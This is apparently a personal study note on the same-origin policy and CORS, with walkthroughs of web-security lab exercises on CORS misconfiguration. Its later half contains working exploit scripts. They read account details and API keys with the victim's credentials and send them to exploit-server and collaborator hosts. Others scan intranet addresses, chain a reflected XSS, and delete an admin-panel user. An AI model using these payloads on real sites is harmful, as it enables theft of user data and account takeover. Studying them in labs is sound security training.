[TOC]
# Same-Origin policy
The same-origin policy is employed to prevent the malicious cross-domain interaction.
The same-origin policy restrict script on one origin from accessing data from another original.
Same-origin policy have to same domain, schema and port from origin.
```
http://meowehcker/meowDir/meow.html
```
```
http://meowhecker/meowDir69 (O
http://meow.meowhecker/meowDir/ (X
http://meowmeow/meowDir (X
https://meowhecker/meowDir (X
http://meowhecker:8080/meowDir (X
http://www.meowhecker/meowDir (X
```
## SOP implemented
SOP is used to controls the resource access that be loaded by the javascript
Allow those tagse
```
<img>....</img>
<video>...</video>
<script>...</script>
```
But origin javascrpt be forbidden to read the resource from the cross-domain
Exception situation:
writable, not readable
location objet -> location.href
```javascript
var currentLRL = location.href
console.log(`Current page is :${currentLRL}`)
location.href="https://Meowhecker.com"
console.log(`Redirect to :${ location.href}`)
```
readable, not writable
windows.length() ->(which stores the number of frames being used on the page)
windows.close()
the function can be called didn't trigger the same-orign policy
```
location.replace("https://cross-origin-Domain/other-page");
```
We can call certain function cross-domain
You have to allow pop the new frame on the browser !!
```javascript
var newWindows = windows.open("http://meowhecker.com");
// To close the new window after a few seconds
setTimeout(function(){
newWindows .close();
},5000);
```
```javascript
newWindow.blur();
newWindow.focus();
```
postMessage Function
Orgin site access and send the message to cross-origin site
```htmlembedded
<!DOCTYPE html>
<html>
<head>
<title>Parent Page</title>
</head>
<body>
<iframe id="myIframe" src="https://crossOrgin.com"></iframe>
<script>
var iframe = document.getElementById("myIframe");
iframe.addEventListener("load", function() {
iframe.contentWindow.postMessage("Hello from Origin site!", "https://crossOrgin.com");
});
</script>
</body>
</html>
```
Cross-origin code
```htmlembedded
<!DOCTYPE html>
<html>
<head>
<title>provide Soruce</title>
</head>
<body>
<script>
window.addEventListener("message", function(event) {
if (event.origin === "https://origin.com") {
console.log("Received message from oring site: " + event.data);
}
});
</script>
</body>
</html>
```
we can attemp to setting same domain to relax SOP maket it interation without be subjected to SOP
it must be part of your Fully Qualified Domain Name (FQDN).
```
document.domain = "it's part of you FQDN"
```
## Relaxation of the same-origin policy
Because the (SOP),accessing resource from one to another website has become quite challenging, to solve the problem we add the CORS mechanism that allow the website includethe CORS header in their reqeust to cross-orign server for validation.
# CORS Principle
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
An example of a cross-origin request: the front-end JavaScript code served from `https://domain-a.com` uses [`XMLHttpRequest`](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) to make a request for `https://domain-b.com/data.json`.
CORS is a mechanism that allows the website to access the resrouces from an external domain, when the website need to fecth resource from a different domain, the request is controlled by CORS machanism
To enable the loading from the external domain, you can add the CORS header.
Browser also will send the "preflight" request to the cross-origin server, to checke the server whether allow the actual request.
---
XMLHttpRequest and Fetch API only can send the request from script, but only can request origin resource for the security issue. Otherwise adding the CROS Header that can allow to use fetch API to
## CORS Reqesut
- Invocation of the XMLHttpRequest and Fech APIs
- WebGL textures
- Images/video frames drawn to a canvas using [`drawImage()`](https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/drawImage "drawImage()").
- [CSS Shapes from images.](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_shapes/Shapes_from_images)
To make website more cool and beautiful, they usually is going to access the accross-orging wibiste resource.
## CORS Request/Response
### Simple Resquest
The simple request doesn't trigger the preflight reqeust, but the cross-origin server has to defined the Access-Control-Allow-Origin to allow shareing the response with the Fetch API or script
#### Allow Methods
- GET
- POST
- HEAD
Automatically Header
- Content-Type
- application/x-www-form-urlencoded
- multipart/form-data
- text/plain
No [`ReadableStream`](https://developer.mozilla.org/en-US/docs/Web/API/ReadableStream) object is used in the request.
origin-server
```javascript
const xhr = new XMLHttpRequest();
const url = "https://hecker.other/resources/public-data/";
xhr.open("GET", url);
xhr.onreadystatechange = someHandler;
xhr.send();
```
XMLHttPRequest will trust it as simple reqeust and didn't invoke the XMLHttpReqeust.upload.addEventListener() to listent preflight response
Fetch Reqeust
```
GET /resources/public-data/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://meow.com
```
Cross-origin Response
```
HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 00:23:53 GMT
Server: Apache/2
Access-Control-Allow-Origin: *
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/xml
[…XML Data…]
```
```
Access-Control-Allow-Origin: *
or
Access-Control-Allow-Origin: https://meow.com
```
relaxation of CORS with wildcars
```
Access-Control-Allow-Origin: *
```
It's not allow
```
Access-Control-Allow-Origin: https://*.normal-website.com
```
### Preflighted Reqesut
Browser will send the preflighted reqeust with OPTION header
```javascript
const xhr = new XMLHttpRequest();
xhr.open("POST", "https://bar.other/doc");
xhr.setRequestHeader("X-PINGOTHER", "pingpong");
xhr.setRequestHeader("Content-Type", "text/xml");
xhr.onreadystatechange = handler;
xhr.send("<person><name>Arun</name></person>");
```
"X-PINGFOTHER: pingpong" and "Content-Type: text/xml"
are not a stantder HTTP Header part of the HTTP/1.1
Preflight request/response
```
OPTIONS /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://meow.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-PINGOTHER, Content-Type
```
```
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-PINGOTHER, Content-Type
```
---
```
HTTP/1.1 204 No Content
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://meow.example
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: X-PINGOTHER, Content-Type
Access-Control-Max-Age: 86400
Vary: Accept-Encoding, Origin
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
```
max-Age -> 86400(24 hour) ```60*60*24```
the response from cross-origin server After the prilight proccess validation is finished the acutal reqeust can access resource form cross-orign server.
Afeter rhe preflight request is finished
Actual reqeust from cross-origin server
---
## Preflighted reqeust and redirects
Some website didn't allow redirection after a preflighted request.
Scenarios:
-> If the reqeust triggers a preflight due to presence of the `Authorization` header.
## Reqeuset with credentials
When you send the reqeust with the credentials, the third-party cookie ploicy will be applied.
```javascript=
const invocation = new XMLHttpRequest();
const url = "https://bar.other/resources/credentialed-content/";
function callOtherDomain() {
if (invocation) {
invocation.open("GET", url, true);
invocation.withCredentials = true;
invocation.onreadystatechange = handler;
invocation.send();
}
}
```
Request with Cookie
Cross-site server save the cookie information
## preflight reqeust and credentials
Base on the Policy, the preflight reqeust never include the credentials.
### Credential reqeust with wildcard
The perflight respond does not allow the wildcare /* for the followding CORS header, if the the next reqeust with the credentials or cookie.
```
Access-Control-Allow-Origin
Access-Control-Allow-XXXX
```
It's not allow
```
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
```
Some server will dynaicm specify the access-controll-allow-Origin base on the client-specified orign, it's not secure
These response headers must specify specific values instead.
### Third-part cookies
if the cross-origin server attempt set to cookie on browser as part of the CORS response, it will be subjected thire-part cookies policy, if the browser is not allow thrid-part cookie, the browser will reject the all such cookie.
# CORS MisConfiguration (vulnerability )
Morden web application typically use CORS mechanism to access resource from the subdomains or trusted third parties.
if they are lazy to correct configure CORS. Their CORS implement probably too relaxated to have vulnerability can be exploit.
A Typical CORS attack relies on the allowing the client to carry cookies to access thire-part domain service.
### Server-generated ACAO header from client-specified origin header
Vulnerable Code
```javascript
const express = require ('express')
const app =express()
app.use((req,res,next)=>{
//get the origin value from reqeust
const origin = req.get('Origin') // return header value
//check whether the origin header exists or not
if(origin){
res.header('Access-Control-Allow-Origin', origin)
console.log("get the origin successful")
}
// proccess the next reqeust!!
next()
})
app.get('/', (req, res) => {
res.send('Hello, World!');
});
app.listen(3000, () => {
console.log('Server is running on port 3000');
});
```
Adding the functionality with reposne the client Cookie
```javascript=
const express = require ('express')
const app =express()
app.use((req,res,next)=>{
//get the origin value from reqeust
const origin = req.get('Origin') // return header value
//check whether the origin header exists or not
if(origin){
res.header('Access-Control-Allow-Origin', origin)
console.log("get the origin successful")
}
// proccess the next reqeust!!
// can recevie the client credentials and send the specific use credential
res.header('Access-Control-Allow-Credentials', true);
res.header('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
// pre-flight reqeust
if (req.method === 'OPTIONS') {
return res.status(204).end();
}
const cookieValue = req.get('meowCookie')
next()
})
app.get('/', (req, res) => {
res.cookie('meowCookie', 'cookieValue', { httpOnly: true, sameSite: 'strict' });
res.send('Hello, World!');
});
app.listen(3000, () => {
console.log('Server is running on port 3000');
});
```
Origin have to schema and domain
http://meow
http://meowhecker
## LAB: CORS vulnerability with basic original reflection
```
API Key is: s0tpCTcjML0rE0TX8nhEC7kED048gySz
```
if we can admin to trigger the reqeust with local cookie
We can let the admin to fetch our malicious server carry the XML request.
Exploit CORS vulnerability
GET /accountDetial
```josn
{
"username": "wiener",
"email": "",
"apikey": "s0tpCTcjML0rE0TX8nhEC7kED048gySz",
"sessions": [
"7Cltjco4Ta8tsLsrYs5jqy0ApbYXmEeL"
]
}
```
Admin -> Running the Script (base on CORS vulnerability)
Exploit 1 (Work)
```javascript=
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0a1b00cd047d7111883b57c8005100ec.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
```
Exploit 2(not work)
```javascript=
<script>
var xhr = new XMLHttpRequest()
//configure http reqeust and method
xhr.open("GET",'https://0a1b00cd047d7111883b57c8005100ec.web-security-academy.net/accountDetails', true)
xhr.withCredentials = true
xhr.onreadystatechange = function(){
if(xhr.status == XMLHttpRequest.DONE){
fetch("/log?key=" + xhr.responseText) // fetch our C2 server, get the senstive Data
}
}
xhr.send()
</script>
```
---
## Parsing Error in Oring Header
Access-Control-Allow-Origin typically ooeration useing whitelist. the client provide Origin's value, which is then be compared with the serve whitelists.
```
GET /data HTTP/1.1
Host: normal-website.com
...
Origin: https://innocent-website.com
```
```
HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: https://innocent-website.com
```
### While list implement mistakes
Somw website will allow the subdomain to access (event if subdomain is not exist)
we can attempt to bypass following match methods, such as Regular expression or matching URL prefixes or suffixes.
```
`normal-website.com`
```
we can try
```
meowhecker.normal-website.com
meowheckernormal-website.com
```
or
```
normal-website.com.meowhecker.com
```
### Whitelisted null origin value
In some unusual situation, the request will send a null origin value
- corss-origin redirct
- request form serialize data
- request use file:// protocol
- file protocol use to read and write the file on locaol systems
- sandboxed cross-origin request.
In some unusual situations, the request will send a null Origin value.
```
GET /sensitive-victim-data
Host: vulnerable-website.com
Origin: null
```
```
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
```
We can use various techniques to send cross-origin requests containing a null value in the Origin Header.
- sandboxed cross-origin request
```
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='malicious-website.com/log?key='+this.responseText;
};
</script>"></iframe>
```
## LAB-CORS vulerabiltiy with trust null origin
```
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="
<script>
var reqeust = new XMLHttpRequest()
reqeust.onload = requestListener;
reqeust.open('GET','https://0a4600f004a8f09c81b8ed11007b00bf.web-security-academy.net/accountDetails',true)
reqeust.withCredentials = ture
reqeust.send()
function requestListener(){
location('https://exploit-0ab700890433f06d8147ecfa01d70062.exploit-server.net/log?key='+encodeURIComponent(this.responseTex))
}
</script>"
></iframe>
<!--
allow script -> "Allow JavaScript execution."
allow top navigatione -> "Allow iframe content to perform redirects or navigate to other pages."
allow-form -> "Allow iframe content to send GET or POST requests."
srcDOc: embeding html
-->
```
allow script -> "Allow JavaScript execution."
allow top navigatione -> "Allow iframe content to perform redirects or navigate to other pages."
allow-form -> "Allow iframe content to send GET or POST requests."
srcDOc: embeding html
Administrator Session
## Exploiting XSS via CORS trust relationship
```
GET /api/requestApiKey HTTP/1.1
Host: vulnerable-website.com
Origin: https://subdomain.vulnerable-website.com
Cookie: sessionid=...
```
```
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://subdomain.vulnerable-website.com
Access-Control-Allow-Credentials: true
```
```
https://subdomain.vulnerable-website.com/?xss=<script>cors-stuff-here</script>
```
if we find the Xss vulnerability in the website, we can inject JS to send the request and retrieve senstive date base on CORS machanism .
## Breaking TLS with pooly configure CORS (MITM) 不太懂原理
Suppose an application that rigorously employs HTTPS also whitelists a trusted subdomain that is using plain HTTP. For example, when the application receives the following request:
`GET /api/requestApiKey HTTP/1.1 Host: vulnerable-website.com Origin: http://trusted-subdomain.vulnerable-website.com Cookie: sessionid=...`
The application responds with:
`HTTP/1.1 200 OK Access-Control-Allow-Origin: http://trusted-subdomain.vulnerable-website.com Access-Control-Allow-Credentials: true`
In this situation, an attacker who is in a position to intercept a victim user's traffic can exploit the CORS configuration to compromise the victim's interaction with the application. This attack involves the following steps:
- The victim user makes any plain HTTP request.
- The attacker injects a redirection to:
`http://trusted-subdomain.vulnerable-website.com`
- The victim's browser follows the redirect.
- The attacker intercepts the plain HTTP request, and returns a spoofed response containing a CORS request to:
`https://vulnerable-website.com`
- The victim's browser makes the CORS request, including the origin:
`http://trusted-subdomain.vulnerable-website.com`
- The application allows the request because this is a whitelisted origin. The requested sensitive data is returned in the response.
- The attacker's spoofed page can read the sensitive data and transmit it to any domain under the attacker's control.
This attack is effective even if the vulnerable website is otherwise robust in its usage of HTTPS, with no HTTP endpoint and all cookies flagged as secure.
## LAB - CORS vulnerability with trusted insecure protocol
### CORS vulnerability with origin reflection
Support insecurity protocol
Trust subdomain (Event if the subdomain is not exists!)
we have to victim to access
```
http://meow.0a4800450447fb5786b4fca900c800b8.web-security-academy
```
let it to request
```
0a4800450447fb5786b4fca900c800b8.web-security-academy.net/accountDetails
```
And it will carry the Cookie to access the thire-part server
According
```
Access-Control-Allow-Credentials: true
```
Redirect the victim to our C2 server
if directory run the script
```
<script>
var xhr = new XMLHttpRequest();
xhr.onload = reqListener;
xhr.open('get','https://0aac005f031ec6d780a72166006f004a.web-security-academy.net/accountDetails',true);
xhr.withCredentials = true;
xhr.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
```
the origin will be http://exploit..... it will be filter by the CORS mechanism
we have to find the XSS vulnerability to execute our Javascript the then the origin will be domin or it subdomain, in result we can exploit CORS misconfiguration to get the victime payload
Reflected XSS
```
GET /?productId=<script>prompt()</script>&storeId=1
```
---
```javascript
<!DOCTYPE html>
<html lang="en">
<body>
<script>
location='http://stock.0a5000fb040a88258227c54c00c100ff.web-security-academy.net/?productId=
<script>
var xhr = new XMLHttpRequest();
xhr.onload = reqListener;
xhr.open('get','https://0a5000fb040a88258227c54c00c100ff.web-security-academy.net/accountDetails',true);
xhr.withCredentials = true;
xhr.send();
function reqListener() {
location='https://exploit-0aae007104cc88208261c41b01ff00d9.exploit-server.net/log?key='+this.responseText;
};
</script>&storeId=1'
</script>
</body>
</html>
```
單/雙引號問題
'+' 在 url 中 會被parse 成空白 我們必須對她做url Encode 讓url 在routing 的時候不要去parse
```
<script> <script>someting </script> </script>
```
避免 吃到第一個 </script> 就終止 JS -> 我們會做< url encode '%3d/script>'
```
< -> %3c
+ -> $2b
```
```htmlembedded
<!DOCTYPE html>
<html lang="en">
<body>
<script>
document.location="http://stock.0a5000fb040a88258227c54c00c100ff.web-security-academy.net/?productId=
<script>
var xhr = new XMLHttpRequest();
xhr.onload = reqListener;
xhr.open('get','https://0a5000fb040a88258227c54c00c100ff.web-security-academy.net/accountDetails',true);
xhr.withCredentials = true;xhr.send();
function reqListener(){
location='https://exploit-0aae007104cc88208261c41b01ff00d9.exploit-server.net/log?key='%2bthis.responseText;
};
%3c/script>&storeId=1"
</script>
</body>
</html>
```
```htmlmixed
<!DOCTYPE html>
<html lang="en">
<body>
<script>
document.location="http://stock.0a5000fb040a88258227c54c00c100ff.web-security-academy.net/?productId=<script>var xhr = new XMLHttpRequest();xhr.onload = reqListener;xhr.open('get','https://0a5000fb040a88258227c54c00c100ff.web-security-academy.net/accountDetails',true);xhr.withCredentials = true;xhr.send();function reqListener(){location='https://exploit-0aae007104cc88208261c41b01ff00d9.exploit-server.net/log?key='%2bthis.responseText;};%3c/script>&storeId=1"
</script>
</body>
</html>
```
## Intranet and CORS without credentials
if
Access-Control-Allow-Credentials: false
CORS reqeust didn't allow to carry any Credential
and it have the origin reflected and Error parsing origin header problem
we can attempt to exploit vulnerable through the XMLHTTPReqeeust or script to accessing the intranet server
## LAB
selfInvokeFuntion
```javascript
urlarray =[]
for (var i = 0;i<10;i++){
urlarray.push((function(index){
url = 'http://meowhecker/page'+index ;
return url;
})(i))
}
console.log(urlarray)
```
```
[
'http://meowhecker/page0',
'http://meowhecker/page1',
'http://meowhecker/page2',
'http://meowhecker/page3',
'http://meowhecker/page4',
'http://meowhecker/page5',
'http://meowhecker/page6',
'http://meowhecker/page7',
'http://meowhecker/page8',
'http://meowhecker/page9'
]
```
queue Request
```javascript
var queue = [];
queue.push(function(value){
console.log('function1',value)
})
queue.push(function(value){
console.log('function2',value)
})
queue.push(function(value){
console.log('function3',value)
})
for (var i=0;i<=3;i++){
if(queue.length){
var func = queue.shift()
func(i*100)
}
}
```
Abort Controller
```htmlembedded
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=\, initial-scale=1.0">
<title>Document</title>
</head>
<body>
HTML info
<script>
var abortController = new AbortController()
//obtain the controller signal
var signal = abortController.signal
//configure TimeOut
setTimeout(function(){
abortController.abort();
},3000)
fetch("http://127.0.0.1:5500/CORS/AttackPaylaod/AbortController.html",{signal}).then(
function(response){
console.log(response)
console.log("---------------------------------------------------")
return response.text()
}).then(function(data){
console.log(data)
return null
//proccessing Data
}).catch(function(error){
if (error.name === "AbortError"){
console.log("request abort")
}else{
console.log("Aries Error ")
}
}
)
</script>
</body>
</html>
```
Scanning the Local Host
we have to find the Local IP that we can use CORS to fetch it
Work !!
```html
<!DOCTYPE html>
<html>
<body>
<script>
var collaboratorURL = "http://g4lydjhoisr6wmda2wm5gqgen5twhr5g.oastify.com";
// Base On CORS Vulnerability
for ( let i = 0; i < 256; i++) {
var ipAddress = "http://192.168.0." + i + ":8080";
fetch(ipAddress)
.then(response => response.text())
.then(text => {
location = collaboratorURL + "?ip=192.168.0." + i + "&code=" + encodeURIComponent(text)
})
}
</script>
</body>
</html>
```
URL decode: 192.168.0.256 Request!!
Testing "http://192.168.0.5/login" page
```html
<!DOCTYPE html>
<html>
<body>
<script>
collaboratorURL="http://389lh6lbmfvt09hx6jqskdk1rsxjlb90.oastify.com"
localURL="http://192.168.0.5:8080"
fetch(localURL+'/login')
.then(response => {response.text()})
.then(text => {
fetch(collaboratorURL + "?code=" + encodeURIComponent(text))
})
</script>
</body>
</html>
```
Regression expression website
https://regex101.com/
```
() -> 集合
^ -> Start
+ -> it like a loop cam mach same condiction mamay time
[] -> 聯集
```
Catch CSRF token regression
```
\csrf" value="([^"]+)"\
```
Probe for XSS
we have to find the XSS vulnerability on website
trigger the javascript on website to
```
<script>
function xss(url, text, vector) {
location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}
function fetchUrl(url, collaboratorURL){
fetch(url).then(r => r.text().then(text => {
xss(url, text, '"><img src='+collaboratorURL+'?foundXSS=1>');
}))
}
fetchUrl("http://192.168.0.5:8080", "http://thebqwu1v54j9zqnf9zit3tr0i69ubi0.oastify.com");
</script>
```
Parse XSS
```
parse1
'"><iframe src=/admin onload="new Image().src=\''
+collaboratorURL+
'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">'
parse2
"><iframe src=/admin onload="new Image().src='collaboratorURL?code='+encodeURIComponent(this.contentWindow.document.body.innerHTML)"></iframe>
```
Get the page source code
Delete User
payload
```
'"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">'
```
Sign in with Wallet
Connect another wallet